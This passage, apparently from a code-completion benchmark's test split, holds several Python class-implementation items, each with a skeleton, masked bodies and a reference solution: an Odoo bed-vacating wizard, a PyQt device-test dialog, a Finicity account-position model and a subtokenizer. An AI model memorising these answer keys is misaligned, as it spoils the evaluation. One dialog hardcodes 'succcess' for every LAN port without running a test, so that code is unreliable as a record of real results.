here!' + emp_name)\n self.bed_id = bed_id.id\n self.room_id = bed_id.room_id.id\n<|end_body_0|>\n\n<|body_start_1|>\n for vac_rec in self:\n history_vals = {'bed_id': vac_rec.bed_id.id, 'room_id': vac_rec.room_id.id, 'accommodation_id': vac_rec.room_id.accommodation_id.id, 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT), 'employee_id': vac_rec.bed_id.employee_id.id, 'country_id': vac_rec.bed_id.employee_id.emp_country_id.id, 'type': 'vacant'}\n vac = vac_rec.bed_id.write({'employee_id': False})\n his = self.env['accommodation.history'].create(history_vals)\n vac_upt = vac_rec.employee_id.write({'accommodated': False})\n return True\n<|end_body_1|>\n", "revision_id": "46e15330b5d642053da61754247f3fbf9d02717e", "skeleton": "<|skeleton|>\nclass wiz_vacant_bed:\n\n def onchange_employee(self):\n \"\"\"This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True\"\"\"\n <|body_0|>\n\n def vacant_bed(self):\n \"\"\"This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class wiz_vacant_bed:\n def onchange_employee(self):\n \"\"\"This method is used to identify the bed and room based on the employee selected. ------------------------------------------------------------------ @param self : object pointer @param return : True\"\"\"\n cr, uid, context = self.env.args\n emp_id = self.employee_id.id\n if emp_id:\n bed_id = self.env['beds.beds'].search([('employee_id', '=', self.employee_id.id), ('room_id.accommodation_id', '=', context.get('accommodation_id'))])\n if not bed_id:\n emp_name = self.employee_id.name\n raise ValidationError('The Employee is not accommodated here!' + emp_name)\n self.bed_id = bed_id.id\n self.room_id = bed_id.room_id.id\n\n def vacant_bed(self):\n \"\"\"This method is used to vacant the bed in a room in accommodation @api.multi : The api of multi decorator @param self : object pointer and Record set @return True\"\"\"\n for vac_rec in self:\n history_vals = {'bed_id': vac_rec.bed_id.id, 'room_id': vac_rec.room_id.id, 'accommodation_id': vac_rec.room_id.accommodation_id.id, 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT), 'employee_id': vac_rec.bed_id.employee_id.id, 'country_id': vac_rec.bed_id.employee_id.emp_country_id.id, 'type': 'vacant'}\n vac = vac_rec.bed_id.write({'employee_id': False})\n his = self.env['accommodation.history'].create(history_vals)\n vac_upt = vac_rec.employee_id.write({'accommodated': False})\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "core/sg_accommodation/wizard/wiz_vacant_bed.py", "source_repo": "Muhammad-SF/Test", "split": "test", "star_events_count": 0} {"blob_id": "531ce051d2812f664f6547071c342c7ce61a77e3", "bodies": ["super(DialogComControlDeviceExecute1, self).__init__(parent)\nself.setupUi(self)\nself.flag = 1", "try:\n self.setWindowTitle(title)\n self.textBrowser_contents.setText(contents)\n if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):\n self.label_img.setPixmap(QtGui.QPixmap(img_file_path))\nexcept:\n pass", "ip = self.lineEdit_ip.text()\nif not ThDataChecker.is_ip(ip):\n QMessageBox.warning(self, ModuleConstants.QMESSAGEBOX_WARN, ModuleConstants.QMESSAGEBOX_WARN_IP_NOT_VALID)\n return\ntry:\n if self.textBrowser_log.document().blockCount() > 10:\n self.textBrowser_log.clear()\n result = ThNetworkTestCase.ping(ip, 2, 4)\n self.test_result[self.windowTitle()] = result[0]\n if result[1] != None:\n self.textBrowser_log.append('')\n for item in result[1]:\n self.textBrowser_log.append(str(item))\n self.textBrowser_log.append('ping test:' + str(result[0]))\nexcept BaseException as e:\n logger.error(str(e))", "temp = TestDataProtocolTransferBoard()\ntemp.lan2 = 'succcess'\ntemp.lan3 = 'succcess'\ntemp.lan4 = 'succcess'\ntemp.lan5 = 'succcess'\ntemp.lan6 = 'succcess'\ntemp.lan7 = 'succcess'\ntemp.lan8 = 'succcess'\ntemp = temp.to_list()\nself._signalFinish.emit(Constants.SIGNAL_TEST_RESULT, temp)\nself._signalFinish.emit(ModuleConstants.PROCESS_CONTROL_NEXT, temp)\nself.accept()\nself.close()"], "bodies_text": "<|body_start_0|>\n super(DialogComControlDeviceExecute1, self).__init__(parent)\n self.setupUi(self)\n self.flag = 1\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.setWindowTitle(title)\n self.textBrowser_contents.setText(contents)\n if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):\n self.label_img.setPixmap(QtGui.QPixmap(img_file_path))\n except:\n pass\n<|end_body_1|>\n\n<|body_start_2|>\n ip = self.lineEdit_ip.text()\n if not ThDataChecker.is_ip(ip):\n QMessageBox.warning(self, ModuleConstants.QMESSAGEBOX_WARN, ModuleConstants.QMESSAGEBOX_WARN_IP_NOT_VALID)\n return\n try:\n if self.textBrowser_log.document().blockCount() > 10:\n self.textBrowser_log.clear()\n result = ThNetworkTestCase.ping(ip, 2, 4)\n self.test_result[self.windowTitle()] = result[0]\n if result[1] != None:\n self.textBrowser_log.append('')\n for item in result[1]:\n self.textBrowser_log.append(str(item))\n self.textBrowser_log.append('ping test:' + str(result[0]))\n except BaseException as e:\n logger.error(str(e))\n<|end_body_2|>\n\n<|body_start_3|>\n temp = TestDataProtocolTransferBoard()\n temp.lan2 = 'succcess'\n temp.lan3 = 'succcess'\n temp.lan4 = 'succcess'\n temp.lan5 = 'succcess'\n temp.lan6 = 'succcess'\n temp.lan7 = 'succcess'\n temp.lan8 = 'succcess'\n temp = temp.to_list()\n self._signalFinish.emit(Constants.SIGNAL_TEST_RESULT, temp)\n self._signalFinish.emit(ModuleConstants.PROCESS_CONTROL_NEXT, temp)\n self.accept()\n self.close()\n<|end_body_3|>\n", "class_docstring": "Class documentation goes here.", "class_name": "DialogComControlDeviceExecute1", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DialogComControlDeviceExecute1:\n \"\"\"Class documentation goes here.\"\"\"\n\n def __init__(self, parent=None):\n \"\"\"Constructor @param parent reference to the parent widget @type QWidget\"\"\"\n <|body_0|>\n\n def set_contents(self, title, contents, img_file_path):\n \"\"\"set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:\"\"\"\n <|body_1|>\n\n def on_pushButton_execute_clicked(self):\n \"\"\"executes the test process\"\"\"\n <|body_2|>\n\n def on_pushButton_next_clicked(self):\n \"\"\"next test case\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(DialogComControlDeviceExecute1, self).__init__(parent)\n self.setupUi(self)\n self.flag = 1\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.setWindowTitle(title)\n self.textBrowser_contents.setText(contents)\n if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):\n self.label_img.setPixmap(QtGui.QPixmap(img_file_path))\n except:\n pass\n<|end_body_1|>\n\n<|body_start_2|>\n ip = self.lineEdit_ip.text()\n if not ThDataChecker.is_ip(ip):\n QMessageBox.warning(self, ModuleConstants.QMESSAGEBOX_WARN, ModuleConstants.QMESSAGEBOX_WARN_IP_NOT_VALID)\n return\n try:\n if self.textBrowser_log.document().blockCount() > 10:\n self.textBrowser_log.clear()\n result = ThNetworkTestCase.ping(ip, 2, 4)\n self.test_result[self.windowTitle()] = result[0]\n if result[1] != None:\n self.textBrowser_log.append('')\n for item in result[1]:\n self.textBrowser_log.append(str(item))\n self.textBrowser_log.append('ping test:' + str(result[0]))\n except BaseException as e:\n logger.error(str(e))\n<|end_body_2|>\n\n<|body_start_3|>\n temp = TestDataProtocolTransferBoard()\n temp.lan2 = 'succcess'\n temp.lan3 = 'succcess'\n temp.lan4 = 'succcess'\n temp.lan5 = 'succcess'\n temp.lan6 = 'succcess'\n temp.lan7 = 'succcess'\n temp.lan8 = 'succcess'\n temp = temp.to_list()\n self._signalFinish.emit(Constants.SIGNAL_TEST_RESULT, temp)\n self._signalFinish.emit(ModuleConstants.PROCESS_CONTROL_NEXT, temp)\n self.accept()\n self.close()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000431", "length_bytes": 3242, "license_type": "no_license", "methods": [{"docstring": "Constructor @param parent reference to the parent widget @type QWidget", "name": "__init__", "signature": "def __init__(self, parent=None)"}, {"docstring": "set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:", "name": "set_contents", "signature": "def set_contents(self, title, contents, img_file_path)"}, {"docstring": "executes the test process", "name": "on_pushButton_execute_clicked", "signature": "def on_pushButton_execute_clicked(self)"}, {"docstring": "next test case", "name": "on_pushButton_next_clicked", "signature": "def on_pushButton_next_clicked(self)"}], "n_methods": 4, "prompt": "Implement the Python class `DialogComControlDeviceExecute1` described below.\n\nClass description:\nClass documentation goes here.\n\nMethod signatures and docstrings:\n- def __init__(self, parent=None): Constructor @param parent reference to the parent widget @type QWidget\n- def set_contents(self, title, contents, img_file_path): set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:\n- def on_pushButton_execute_clicked(self): executes the test process\n- def on_pushButton_next_clicked(self): next test case", "prompted_full_text": "Implement the Python class `DialogComControlDeviceExecute1` described below.\n\nClass description:\nClass documentation goes here.\n\nMethod signatures and docstrings:\n- def __init__(self, parent=None): Constructor @param parent reference to the parent widget @type QWidget\n- def set_contents(self, title, contents, img_file_path): set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:\n- def on_pushButton_execute_clicked(self): executes the test process\n- def on_pushButton_next_clicked(self): next test case\n\n<|skeleton|>\nclass DialogComControlDeviceExecute1:\n \"\"\"Class documentation goes here.\"\"\"\n\n def __init__(self, parent=None):\n \"\"\"Constructor @param parent reference to the parent widget @type QWidget\"\"\"\n <|body_0|>\n\n def set_contents(self, title, contents, img_file_path):\n \"\"\"set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:\"\"\"\n <|body_1|>\n\n def on_pushButton_execute_clicked(self):\n \"\"\"executes the test process\"\"\"\n <|body_2|>\n\n def on_pushButton_next_clicked(self):\n \"\"\"next test case\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(DialogComControlDeviceExecute1, self).__init__(parent)\n self.setupUi(self)\n self.flag = 1\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.setWindowTitle(title)\n self.textBrowser_contents.setText(contents)\n if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):\n self.label_img.setPixmap(QtGui.QPixmap(img_file_path))\n except:\n pass\n<|end_body_1|>\n\n<|body_start_2|>\n ip = self.lineEdit_ip.text()\n if not ThDataChecker.is_ip(ip):\n QMessageBox.warning(self, ModuleConstants.QMESSAGEBOX_WARN, ModuleConstants.QMESSAGEBOX_WARN_IP_NOT_VALID)\n return\n try:\n if self.textBrowser_log.document().blockCount() > 10:\n self.textBrowser_log.clear()\n result = ThNetworkTestCase.ping(ip, 2, 4)\n self.test_result[self.windowTitle()] = result[0]\n if result[1] != None:\n self.textBrowser_log.append('')\n for item in result[1]:\n self.textBrowser_log.append(str(item))\n self.textBrowser_log.append('ping test:' + str(result[0]))\n except BaseException as e:\n logger.error(str(e))\n<|end_body_2|>\n\n<|body_start_3|>\n temp = TestDataProtocolTransferBoard()\n temp.lan2 = 'succcess'\n temp.lan3 = 'succcess'\n temp.lan4 = 'succcess'\n temp.lan5 = 'succcess'\n temp.lan6 = 'succcess'\n temp.lan7 = 'succcess'\n temp.lan8 = 'succcess'\n temp = temp.to_list()\n self._signalFinish.emit(Constants.SIGNAL_TEST_RESULT, temp)\n self._signalFinish.emit(ModuleConstants.PROCESS_CONTROL_NEXT, temp)\n self.accept()\n self.close()\n<|end_body_3|>\n", "revision_id": "57dd2197e7d91b8ad8fb2bd0e3503f10afa08544", "skeleton": "<|skeleton|>\nclass DialogComControlDeviceExecute1:\n \"\"\"Class documentation goes here.\"\"\"\n\n def __init__(self, parent=None):\n \"\"\"Constructor @param parent reference to the parent widget @type QWidget\"\"\"\n <|body_0|>\n\n def set_contents(self, title, contents, img_file_path):\n \"\"\"set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:\"\"\"\n <|body_1|>\n\n def on_pushButton_execute_clicked(self):\n \"\"\"executes the test process\"\"\"\n <|body_2|>\n\n def on_pushButton_next_clicked(self):\n \"\"\"next test case\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DialogComControlDeviceExecute1:\n \"\"\"Class documentation goes here.\"\"\"\n\n def __init__(self, parent=None):\n \"\"\"Constructor @param parent reference to the parent widget @type QWidget\"\"\"\n super(DialogComControlDeviceExecute1, self).__init__(parent)\n self.setupUi(self)\n self.flag = 1\n\n def set_contents(self, title, contents, img_file_path):\n \"\"\"set gui display information :param title: dialog window title :param contents: dialog content browser information :param img_file_path: if it has,the image file full path :return:\"\"\"\n try:\n self.setWindowTitle(title)\n self.textBrowser_contents.setText(contents)\n if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):\n self.label_img.setPixmap(QtGui.QPixmap(img_file_path))\n except:\n pass\n\n def on_pushButton_execute_clicked(self):\n \"\"\"executes the test process\"\"\"\n ip = self.lineEdit_ip.text()\n if not ThDataChecker.is_ip(ip):\n QMessageBox.warning(self, ModuleConstants.QMESSAGEBOX_WARN, ModuleConstants.QMESSAGEBOX_WARN_IP_NOT_VALID)\n return\n try:\n if self.textBrowser_log.document().blockCount() > 10:\n self.textBrowser_log.clear()\n result = ThNetworkTestCase.ping(ip, 2, 4)\n self.test_result[self.windowTitle()] = result[0]\n if result[1] != None:\n self.textBrowser_log.append('')\n for item in result[1]:\n self.textBrowser_log.append(str(item))\n self.textBrowser_log.append('ping test:' + str(result[0]))\n except BaseException as e:\n logger.error(str(e))\n\n def on_pushButton_next_clicked(self):\n \"\"\"next test case\"\"\"\n temp = TestDataProtocolTransferBoard()\n temp.lan2 = 'succcess'\n temp.lan3 = 'succcess'\n temp.lan4 = 'succcess'\n temp.lan5 = 'succcess'\n temp.lan6 = 'succcess'\n temp.lan7 = 'succcess'\n temp.lan8 = 'succcess'\n temp = temp.to_list()\n self._signalFinish.emit(Constants.SIGNAL_TEST_RESULT, temp)\n self._signalFinish.emit(ModuleConstants.PROCESS_CONTROL_NEXT, temp)\n self.accept()\n self.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "modules/com_control_device_new/COM_CONTROL_DEVICE_EXECUTE1.py", "source_repo": "gaoxingyu-hub/54testframework-master-e284", "split": "test", "star_events_count": 0} {"blob_id": "f305ddc1a75ca836d94d183268f24e723db473b8", "bodies": ["self.id = id\nself.description = description\nself.cusip_no = cusip_no\nself.symbol = symbol\nself.quantity = quantity\nself.current_price = current_price\nself.fund_name = fund_name\nself.security_name = security_name\nself.transaction_type = transaction_type\nself.market_value = market_value\nself.cost_basis = cost_basis\nself.units = units\nself.unit_price = unit_price\nself.status = status\nself.current_price_date = current_price_date\nself.inv_security_type = inv_security_type\nself.additional_properties = additional_properties", "if dictionary is None:\n return None\nid = dictionary.get('id')\ndescription = dictionary.get('description')\ncusip_no = dictionary.get('cusipNo')\nsymbol = dictionary.get('symbol')\nquantity = dictionary.get('quantity')\ncurrent_price = dictionary.get('currentPrice')\nfund_name = dictionary.get('fundName')\nsecurity_name = dictionary.get('securityName')\ntransaction_type = dictionary.get('transactionType')\nmarket_value = dictionary.get('marketValue')\ncost_basis = dictionary.get('costBasis')\nunits = dictionary.get('units')\nunit_price = dictionary.get('unitPrice')\nstatus = dictionary.get('status')\ncurrent_price_date = dictionary.get('currentPriceDate')\ninv_security_type = dictionary.get('invSecurityType')\nfor key in cls._names.values():\n if key in dictionary:\n del dictionary[key]\nreturn cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)"], "bodies_text": "<|body_start_0|>\n self.id = id\n self.description = description\n self.cusip_no = cusip_no\n self.symbol = symbol\n self.quantity = quantity\n self.current_price = current_price\n self.fund_name = fund_name\n self.security_name = security_name\n self.transaction_type = transaction_type\n self.market_value = market_value\n self.cost_basis = cost_basis\n self.units = units\n self.unit_price = unit_price\n self.status = status\n self.current_price_date = current_price_date\n self.inv_security_type = inv_security_type\n self.additional_properties = additional_properties\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n id = dictionary.get('id')\n description = dictionary.get('description')\n cusip_no = dictionary.get('cusipNo')\n symbol = dictionary.get('symbol')\n quantity = dictionary.get('quantity')\n current_price = dictionary.get('currentPrice')\n fund_name = dictionary.get('fundName')\n security_name = dictionary.get('securityName')\n transaction_type = dictionary.get('transactionType')\n market_value = dictionary.get('marketValue')\n cost_basis = dictionary.get('costBasis')\n units = dictionary.get('units')\n unit_price = dictionary.get('unitPrice')\n status = dictionary.get('status')\n current_price_date = dictionary.get('currentPriceDate')\n inv_security_type = dictionary.get('invSecurityType')\n for key in cls._names.values():\n if key in dictionary:\n del dictionary[key]\n return cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke", "class_name": "CustomerAccountPosition", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomerAccountPosition:\n \"\"\"Implementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\"\"\"\n\n def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):\n \"\"\"Constructor for the CustomerAccountPosition class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id = id\n self.description = description\n self.cusip_no = cusip_no\n self.symbol = symbol\n self.quantity = quantity\n self.current_price = current_price\n self.fund_name = fund_name\n self.security_name = security_name\n self.transaction_type = transaction_type\n self.market_value = market_value\n self.cost_basis = cost_basis\n self.units = units\n self.unit_price = unit_price\n self.status = status\n self.current_price_date = current_price_date\n self.inv_security_type = inv_security_type\n self.additional_properties = additional_properties\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n id = dictionary.get('id')\n description = dictionary.get('description')\n cusip_no = dictionary.get('cusipNo')\n symbol = dictionary.get('symbol')\n quantity = dictionary.get('quantity')\n current_price = dictionary.get('currentPrice')\n fund_name = dictionary.get('fundName')\n security_name = dictionary.get('securityName')\n transaction_type = dictionary.get('transactionType')\n market_value = dictionary.get('marketValue')\n cost_basis = dictionary.get('costBasis')\n units = dictionary.get('units')\n unit_price = dictionary.get('unitPrice')\n status = dictionary.get('status')\n current_price_date = dictionary.get('currentPriceDate')\n inv_security_type = dictionary.get('invSecurityType')\n for key in cls._names.values():\n if key in dictionary:\n del dictionary[key]\n return cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000432", "length_bytes": 5672, "license_type": "permissive", "methods": [{"docstring": "Constructor for the CustomerAccountPosition class", "name": "__init__", "signature": "def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={})"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007368", "prompt": "Implement the Python class `CustomerAccountPosition` described below.\n\nClass description:\nImplementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\n\nMethod signatures and docstrings:\n- def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}): Constructor for the CustomerAccountPosition class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `CustomerAccountPosition` described below.\n\nClass description:\nImplementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\n\nMethod signatures and docstrings:\n- def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}): Constructor for the CustomerAccountPosition class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass CustomerAccountPosition:\n \"\"\"Implementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\"\"\"\n\n def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):\n \"\"\"Constructor for the CustomerAccountPosition class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id = id\n self.description = description\n self.cusip_no = cusip_no\n self.symbol = symbol\n self.quantity = quantity\n self.current_price = current_price\n self.fund_name = fund_name\n self.security_name = security_name\n self.transaction_type = transaction_type\n self.market_value = market_value\n self.cost_basis = cost_basis\n self.units = units\n self.unit_price = unit_price\n self.status = status\n self.current_price_date = current_price_date\n self.inv_security_type = inv_security_type\n self.additional_properties = additional_properties\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n id = dictionary.get('id')\n description = dictionary.get('description')\n cusip_no = dictionary.get('cusipNo')\n symbol = dictionary.get('symbol')\n quantity = dictionary.get('quantity')\n current_price = dictionary.get('currentPrice')\n fund_name = dictionary.get('fundName')\n security_name = dictionary.get('securityName')\n transaction_type = dictionary.get('transactionType')\n market_value = dictionary.get('marketValue')\n cost_basis = dictionary.get('costBasis')\n units = dictionary.get('units')\n unit_price = dictionary.get('unitPrice')\n status = dictionary.get('status')\n current_price_date = dictionary.get('currentPriceDate')\n inv_security_type = dictionary.get('invSecurityType')\n for key in cls._names.values():\n if key in dictionary:\n del dictionary[key]\n return cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)\n<|end_body_1|>\n", "revision_id": "b2ab1ded435db75c78d42261f5e4acd2a3061487", "skeleton": "<|skeleton|>\nclass CustomerAccountPosition:\n \"\"\"Implementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\"\"\"\n\n def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):\n \"\"\"Constructor for the CustomerAccountPosition class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomerAccountPosition:\n \"\"\"Implementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\"\"\"\n\n def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):\n \"\"\"Constructor for the CustomerAccountPosition class\"\"\"\n self.id = id\n self.description = description\n self.cusip_no = cusip_no\n self.symbol = symbol\n self.quantity = quantity\n self.current_price = current_price\n self.fund_name = fund_name\n self.security_name = security_name\n self.transaction_type = transaction_type\n self.market_value = market_value\n self.cost_basis = cost_basis\n self.units = units\n self.unit_price = unit_price\n self.status = status\n self.current_price_date = current_price_date\n self.inv_security_type = inv_security_type\n self.additional_properties = additional_properties\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n id = dictionary.get('id')\n description = dictionary.get('description')\n cusip_no = dictionary.get('cusipNo')\n symbol = dictionary.get('symbol')\n quantity = dictionary.get('quantity')\n current_price = dictionary.get('currentPrice')\n fund_name = dictionary.get('fundName')\n security_name = dictionary.get('securityName')\n transaction_type = dictionary.get('transactionType')\n market_value = dictionary.get('marketValue')\n cost_basis = dictionary.get('costBasis')\n units = dictionary.get('units')\n unit_price = dictionary.get('unitPrice')\n status = dictionary.get('status')\n current_price_date = dictionary.get('currentPriceDate')\n inv_security_type = dictionary.get('invSecurityType')\n for key in cls._names.values():\n if key in dictionary:\n del dictionary[key]\n return cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)\n", "source": "the_stack_v2_python_sparse", "source_path": "finicityapi/models/customer_account_position.py", "source_repo": "monarchmoney/finicity-python", "split": "test", "star_events_count": 0} {"blob_id": "e936fa99361410dd4af805eacb81c0ed88056446", "bodies": ["tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\nif reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\nself.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\nself.alphabet = _generate_alphabet_dict(self.subtoken_list)\nself.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\nself.max_subtoken_length = 0\nfor subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\nself._cache_size = 2 ** 20\nself._cache = [(None, None)] * self._cache_size", "if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\nif 